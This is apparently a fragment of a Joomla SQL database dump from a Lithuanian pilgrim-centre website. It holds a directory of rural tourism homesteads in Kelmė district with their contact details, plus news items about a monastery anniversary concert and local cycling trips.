style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.tytuvenupapartis.lt/\">http://www.tytuvenupapartis.lt/</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Prie upės“</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba “Prie upės” yra įsikūrusi atokiame ir jaukiame gamtos kampelyje prie Dubysos upės, kur visais metų laikais nepaprastas gamtos grožis garantuos gerą  šventinę nuotaiką! Sodyba “Prie upės” puikiai tiks atšvęsti vestuves, gimtadienius, krikštynas ar tiesiog niekieno netrukdomiems smagiai praleisti laiką draugų būryje.  Sodybos “Prie upės” privalumas yra tai, kad Jūs didelėje, aptvertoje sodybos teritorijoje būsite vieni patys be pašalinių žmonių, todėl galėsite džiaugtis savo švente niekieno netrukdomi natūralios gamtos apsuptyje. Šiltus vasaros vakarus maloniai praleiskite besišnekučiuodami su bičiuliais laužo šviesoje, tyliai spragsint žarijoms. Specialiai tam sodyboje yra įrengta lauko pavėsinė su židiniu.</p>\r\n<p style=\"text-align: justify;\">Sodyba skirta tiek šeimyniniam poilsiui, tiek įvairioms šventėms bei pokyliams švęsti.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Padvarninkų g. 10, Vijurkai, Kelmės raj.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 698 84029</p>\r\n<p style=\"text-align: justify;\">El. paštas info@sodybaprieupes.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.sodybaprieupes.lt/\">http://www.sodybaprieupes.lt/</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Kukučių sodyba“</strong></p>\r\n<p style=\"text-align: justify;\">Kaimo turizmo sodyboje kviečiame pailsėti ramioje aplinkoje, atšvęsti vestuves ir kitas šventes pokylių salėje Kukečiuose, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Kukečių g. 40, Kukečiai, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 603 73763</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Marčio sodyba“</strong></p>\r\n<p style=\"text-align: justify;\">Kaimo turizmo sodyboje kviečiame pailsėti ramioje aplinkoje, atšvęsti vestuves ir kitas šventes pokylių salėje.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Žvilgių kaimas, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 603 73763</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Gitanos sodyba“</strong></p>\r\n<p style=\"text-align: justify;\">Kurtuvėnų regioniniame parke apsupta nepakartojamo grožio gamtos, netoli gilaus Šonelio ežero, kur auga didžiuliai juodalksniai, o vasarą dangų remiančiame berže čiulba gal tūkstantis paukščių, stovi sodyba, kurioje yra: pavėsinė, krepšinio aikštelė, vila su šešiais erdviais miegamaisiais, didžiule pokylių sale, virtuve. Atskiras pirties pastatas su poilsio kambariu, tvenkinys, japoniška pirtis (kubilas).  Čia galima ne tik pailsėti su draugais, pasikaitinti pirtyje, bet ir surengti pokylį, prezentaciją, ar konferenciją.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Jadvygavos kaimas, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 698 41169</p>\r\n<p style=\"text-align: justify;\">El. paštas nta@anara.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.gitanossodyba.lt/\">http://www.gitanossodyba.lt/</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Medinčius“</strong></p>\r\n<p style=\"text-align: justify;\">Medinčiumi seniau žmonės vadindavo eigulį. Jo pareiga – globoti ir saugoti mišką.</p>\r\n<p style=\"text-align: justify;\">„Medinčiaus“ sodyba – ne tik visai greta miško, bet ir įrengta su pagarba medžiui – ekologiški rąstiniai statiniai – be lako, be chemijos. Rąstai ištepti specialiu aliejumi, o durys trintos vašku. Tiesa, vanduo sodyboje – iš 140 metrų gylio gręžinio, todėl vanduo – ypač švarus. Sodybos kompleksas – tai pokylių salės, pirtis ir kubilai (šalto bei karšto vandens).</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Kalniškių kaimas, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 618 177 97</p>\r\n<p style=\"text-align: justify;\">El. p. svacys@gmail.com</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.medincius.lt\">http://www.medincius.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Draugų slėnis“</strong></p>\r\n<p style=\"text-align: justify;\">Poilsis gamtoje, žvejyba, vaikų žaidimų aikštelės. Pavaišinsime įvairių žolelių arbata. Jūsų lauki jauki pokylių salė su miegamaisiais, kaimiška pirtis.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Paverpenio kaimas, Kukečių seniūnija, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 694 27 836</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Akmenukė“</strong></p>\r\n<p style=\"text-align: justify;\">Nuomojama sodyba. Nuo Šiaulių važiuodami senuoju keliu Kelmės link rasite rojaus kampelį, kurį kelių kilometrų spinduliu supa Bijotės, Pagėluvio, Dūkšto ežerai, kiti vandens telkiniai, miškai. Labai geras privažiavimas, 1 km nuo senojo Kelmės plento. Moderni ir erdvi 100 m² pokylių salė, židinys, muzika, koncertiniai šviesos efektai, gera garso akustika. Karštą vasarą atvėsins ventiliatoriai, yra šviestuvai, prie salės yra lauko terasa, erdvi virtuvė su visa įranga. Atskirame pastate yra miegamieji. 0,7 ha kiemas su gėlynais ir gėlinėmis, lauko židiniai, pirtis, tvenkinys, kuriame malonu atsigaivinti po pirties.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Kumpiškės kaimas, Kukečių seniūnija, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob.: 8 685 60136, 8 656 50283</p>\r\n<p style=\"text-align: justify;\">El. paštas akmenuke1@gmail.com</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.akmenuke.lt\">www.akmenuke.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Prienų vienkiemis“</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba neįprastu pavadinimu suintriguoja daugelį poilsiautojų. Čia gali ilsėtis norintieji pasimėgauti ramybe, nuostabia gamta. Pokylių salė puošta etnokultūros elementais. Sodybai teikia šilumą jos stilius, malonūs šeimininkai ir aplinką supantys medžiai.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Laugalio k., Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 612 51 459</p>\r\n<p style=\"text-align: justify;\">El. paštas janina@prienuvienkiemis.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė: <a href=\"http://www.prienuvienkiemis.lt/\">http://www.prienuvienkiemis.lt/</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Gaja“</strong></p>\r\n<p style=\"text-align: justify;\">Kaimo turizmo sodyba „Gaja“ įsikūrusi Dubysos slėnyje, ypač vaizdingame kraštovaizdyje, tarp trijų regioninių parkų – Kurtuvėnų regioninio parko, Tytuvėnų regioninio parko, Dubysos regioninio parko, įvairių draustinių ir kitų lankytinų gamtos, archeologijos, paveldo objektų. Sodyboje svečiai apgyvendinami jaukiuose dviviečiuose, triviečiuose, keturviečiuose kambariuose ir šeimyniniuose numeriuose su visais patogumais. Pro langus atsiveria nepakartojama Dubysos slėnio panorama, aukšti šlaitai, upės vingis, ošiantis pušynas. Sodyboje „Gaja“ svečių laukia jaukios poilsiavietės ant Dubysos kranto. Keliaujantiems baidarėmis suteikiama nemokama stovyklavietė: erdvi pavėsinė, automobilių stovėjimo aikštelė, žaidimo aikštelės, WC. Kaimo turizmo sodyba „Gaja“ Jums siūlo naują, modernų, saugų ir patogų inventorių, skirtą kelionėms baidarėmis. Jūs keliausite naujomis baidarėmis „Vista“ ir „Dag Freeland“. Sodybos svečiai aktyvų laisvalaikį gali leisti krepšinio, tinklinio aikštelėje.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Pabariukų k., Tytuvėnų sen., Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Tel. 8 611 99 616</p>\r\n<p style=\"text-align: justify;\">El. paštas info@sodybagaja.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.sodybagaja.lt\">www.sodybagaja.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Liepynė“</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba įsikūrusi unikaliame gamtos kampelyje, ją supantys miškai ir laukai garantuoja gamtos ramybę, oro gaivumą, sielos ramumą. Jums siūloma unikali pirtis, įrengta tvenkinio viduryje plaukiojančiame laive, vėlyvais vakarais pasišildyti jaukioje pavėsinėje su neįprastu židiniu. Pobūviams ir vakarėliams turime puikią salę. Mūsų sodyba – Jūsų gera nuotaika.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Kuzokų k., Liolių sen., Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 626 69755</p>\r\n<p style=\"text-align: justify;\">El. paštas uab.baltrix@gmail.com</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Miško vingis“</strong></p>\r\n<p style=\"text-align: justify;\">Nepakartojamas Dubysos regioninio parko grožis, tyras kaip krištolas upės ir sodybos tvenkinių vandens gaivumas, aplinkinių laukų platumos, tolimo miško ošimas, gyvenimo sąlygų komfortas leis pamiršti kasdienius rūpesčius, atgauti jėgas, atgaivinti sielą. Sodyboje poilsiautojai laukiami visus metus. Čia ideali vieta rengti seminarus, darbuotojų mokymus su modernia įranga.</p>\r\n<p style=\"text-align: justify;\">Maloniai kviečiame Jus atšvęsti gražiausias Jūsų šventes gamtos apsuptyje. Jums siūlome 60-ies vietų pokylių salę su židiniu. Jūsų patogumui tvarkingai įrengti kambariai miegui ir poilsiui su švaria patalyne. 3-jų namelių kompleksas, pirtis, kubilas, sporto aikštynas bei žaidimų aikštelė. Pirtį galima išsinuomoti atskirai. Papildomai teikiame dekoravimo ir maitinimo paslaugas.</p>\r\n<p style=\"text-align: justify;\">Sodyba yra kelyje Kelmė–Tytuvėnai, prieš ženklą Bulavėnai (3 km nuo pagrindinio kelio).</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Bulavėnų kaimas, Tytuvėnų apylinkių seniūnija, Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 615 10542</p>\r\n<p style=\"text-align: justify;\">El. paštas info@miskovingis.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.miskovingis.lt/\">http://www.miskovingis.lt/</a></p>\r\n<p style=\"text-align: justify;\">Skype: miskovingis</p>\r\n<p style=\"text-align: justify;\">Facebook: Miško vingis (Kaimo turizmas Miško vingis)</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Miego klinika“</strong></p>\r\n<p style=\"text-align: justify;\">„Miego klinika“ įsikūrusi Kelmės rajone, Raudsparnės kaime esančiame Kurtuvėnų regioniniame parke. Kaimo turizmo sodybos kompleksą sudaro keturios pokylių salės. Didžiojoje – „Meilės salėje“ telpa per 60 svečių, o nedidukėje – „Pelėdos buveinėje“ iki 30 svečių. Sodyba tinkama ir šeimos šventėms: vestuvėms, krikštynoms, jubiliejams, ir pažymėti valstybines šventes ar sutikti Naujuosius. Prie pokylių salių įrengtos ir virtuvėlės. Švenčiantiems vestuves siūlome atskirus kaimiško pobūdžio apartamentus, kuriuose rasite dvigulę lovą, sofą, kušetę, televizorių ir jaukumo suteikiantį židinį. Galime Jums pasiūlyti kubilą ir 3 tradicines rusiškas garo pirtis: „Velnio“, „Raganos“, „Piratų“. Svečių patogumui virš pirtelių įrengtos miegamos vietos. Visi nameliai ir pirtelės yra atokiai viena nuo kitos.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Raudsparnės k., Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob. 8 612 22 203</p>\r\n<p style=\"text-align: justify;\">El. paštas info@miegoklinika.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.miegoklinika.lt\">www.miegoklinika.lt</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „Ąžuolų slėnis“</strong></p>\r\n<p style=\"text-align: justify;\">Sodyba įsikūrusi buvusio dvaro teritorijoje – vienkiemyje, prie legendomis apipinto Kibirkštuko ežero. Kviečiame paviešėti kolektyvus, šeimas, moksleivių grupes. Siūlome ne tik pasigrožėti nuostabia gamta, karūnuotaisiais danieliais, nepakartojamų ilgakojų stručių šokiu, bet ir organizuoti įvairias šventes, susitikimus, seminarus, konferencijas. Besidomintiems tautos praeitimi sudarysime galimybę dalyvauti pažintinėje ekskursijoje po vietos apylinkes, papasakosime apie senąją dvarvietę, kur dabar auginami Afrikos stručiai. Norintiems ilgiau paviešėti siūlome 2–4 vietų kambarius, baseiną, pirtį, sūkurinę vonią, žaidimų aikšteles. Ieškantieji romantikos galės įsikurti stovyklavietėje ar namelyje ant ratų.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Targauskių k., Kukečių sen., Kelmės r.</p>\r\n<p style=\"text-align: justify;\">Mob.: 8 687 32 737, 8 655 69 720</p>\r\n<p style=\"text-align: justify;\">El. paštas azuolu.slenis@gmail.com</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.azuoluslenis.eu\">www.azuoluslenis.eu</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Kaimo turizmo sodyba „5 sezonas“</strong></p>\r\n<p style=\"text-align: justify;\">Moderni kaimo turizmo sodyba ribojasi su Dubysos upe. Labai graži, vaizdinga vietovė, atsiveria visa Padubysio erdvė. Nameliai išdėstyti kalne, tai suteikia dar didesnį erdvės pojūtį. Šiltuoju sezonu ant pagrindinio namo stogo įrengiama įspūdingo dydžio lauko terasa. Visa teritorija apšviesta, takeliai ir automobilių stovėjimo aikštelė iškloti trinkelėmis. Poilsio kompleksą sudaro pagrindinis namas bei trys atskiri šeimyniniam poilsiui pritaikyti nameliai. Pagrindiniame name yra konferencijų ir pokylių salė su reikalinga įranga, penki poilsiui pritaikyti numeriai su mažomis virtuvėmis ir kiekvienam kambariui skirtu WC ir dušu. Rūsyje – turkiška pirtis, baseinas su masažine srove; biliardo stalas. Kiekvienas kambarys turi atskirą terasą su lauko baldais.</p>\r\n<p style=\"text-align: justify;\">Adresas:</p>\r\n<p style=\"text-align: justify;\">Rėžalių k., Tytuvėnų apylinkių seniūnija, Kelmės rajonas</p>\r\n<p style=\"text-align: justify;\">Mob. 8 611 16 797</p>\r\n<p style=\"text-align: justify;\">El. paštas info@5sezonas.lt</p>\r\n<p style=\"text-align: justify;\">Interneto svetainė <a href=\"http://www.5sezonas.lt\">www.5sezonas.lt</a></p>\r\n<p> </p>\r\n<p><strong>Svečių namai Kelmėje</strong></p>\r\n<p>Svečių namai Kelmėje. Kambariuose TV, Wifi, patalynė, rankšluosčiai. Bendra virtuvė (šaldytuvas, mikrobangų krosnelė, virdulys, indai).</p>\r\n<p>Adresas</p>\r\n<p>Smilgevičiaus g. 11, Kelmė</p>\r\n<p>Tel. +370 674 37990, +370 614 07422</p>\r\n<p>El. p. apgyvendinimas123@gmail.com</p>\r\n<p>Facebook  Accommodation in Kelme</p>\r\n<p> </p>','',1,0,0,52,'2011-04-14 10:48:58',135,'','2024-06-18 13:32:25',135,0,'0000-00-00 00:00:00','2011-04-14 10:48:58','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',131,0,12,'','',1,31201,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(192,279,'Koncertas fundacijos 400 metų progai paminėti','koncertas-fundacijos-400-metu-progai-pamineti','','<p style=\"text-align: left;\">Š.m. gegužės 2 d. Tytuvėnų bernardinų vienuolyno kiemelyje skambėjo  renesanso, baroko, romantizmo epochų bei šių dienų kompozitorių kūriniai.</p>\r\n','\r\n<p><img src=\"images/stories/naujienos/fundacijos_koncertas/1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p>„1614 m. gegužės 1 d. A. Valavičius surašė bernardinų vienuoliams skirtą aktą apie ketinimą funduoti vienuolyną Tytuvėnuose. Statyboms numatytoms keleriems metams, buvo skirta 10 000 auksinų suma, o statybų pagalbininkais turėjo rūpintis patys vienuoliai‘‘ istoriniais faktais VšĮ ,,Tytuvėnų piligrimų centras‘‘ direktorė Asta Vaitkevičiūtė-Kizienė atidarė renginį.</p>\r\n<p>Žiūrovai gausiai plojimais pasitiko  Kauno vokalinį ansamblį ACUSTO.</p>\r\n<p><img src=\"images/stories/naujienos/fundacijos_koncertas/2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p>Tai pirmasis koncertas skirtas Tytuvėnų bažnyčios ir vienuolyno fundacijos 400 metų  progai paminėti. Šia didžia proga šiais metais numatomi dar du koncertai, knygos išleidimas ir pristatymas.<br /><br /></p>\r\n<p><iframe src=\"https://docs.google.com/file/d/0B3UVPdFnQHubcEtfQzJENWEtbk0/preview?pli=1\" width=\"640\" height=\"385\"></iframe></p>',1,0,0,44,'2014-05-10 07:45:00',135,'','2014-05-10 08:17:42',135,0,'0000-00-00 00:00:00','2014-05-10 07:45:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/fundacijos_koncertas\\/1m.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,165,'','',1,4149,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(318,407,'Žygis dviračiais','zygis-dviraciais','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnų piligrimų centras\" birželio 2 d. kvietė visus dalyvauti dviračių žygyje po Tytuvėnų apylinkes. <br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal <span>width=500</span>}stories/naujienos/dviraciu_zygis2018/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Žygis tapo šaunia tradicija skaičiuojančia jau šeštus metus. Sulaukėme dalyvių iš Radviliškio, Tauragės, Šiaulių, Raseinių, Kuršėnų ir aišku kaip be tytuvėniškių. Žygio metu aplankėme Pagryžuvio dvarą, sodybą ,,Gaja‘‘ir zoologijos sodą, keturis piliakalnius, išsimaudėme Dubysoje, Gylio ežere. Didžiulį įspūdį paliko žirgų pasirodymas, lyg užsakytas šou, lydėjęs mus  keletą šimtų metrų. Šiek tiek pavargę, bet geros nuotaikos, saulės nubučiuoti, pilni įspūdžių, įveikę 36 kilometrus, grįžome į Tytuvos šventę. Apdovanoti žygio spartuoliai: Silvija Mikalauskienė ir Gintautas Bagdonavičius, jauniausias dalyvis Jonas Parnarauskas, užduočių įveikimo meistre pripažinta Izabelė Pastorastytė, specialiu UAB ,,Pardavimų automatai‘‘ prizu apdovanota sportiškiausia komanda iš Radviliškio.    </span></span></span></span></span></span></p>',1,0,0,44,'2018-06-05 07:45:56',135,'','2018-06-05 07:47:11',135,0,'0000-00-00 00:00:00','2018-06-05 07:45:56','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dviraciu_zygis2018\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,67,'','',1,2639,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(193,280,'Dviračių žygis 2014-06-07','dviraciu-zygis-2014-06-07','','<p><strong>Kada?</strong> Birželio 7 d. 11 val.nuo  Tytuvėnų vienuolyno.</p>\r\n<p><strong>Kur?</strong> Tytuvėnai-Šiluva- Tytuvėnai 30 km.</p>\r\n','\r\n<p><img src=\"images/stories/naujienos/zygis.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2014-05-27 20:30:04',135,'','2014-05-27 20:34:32',135,0,'0000-00-00 00:00:00','2014-05-27 20:30:04','0000-00-00 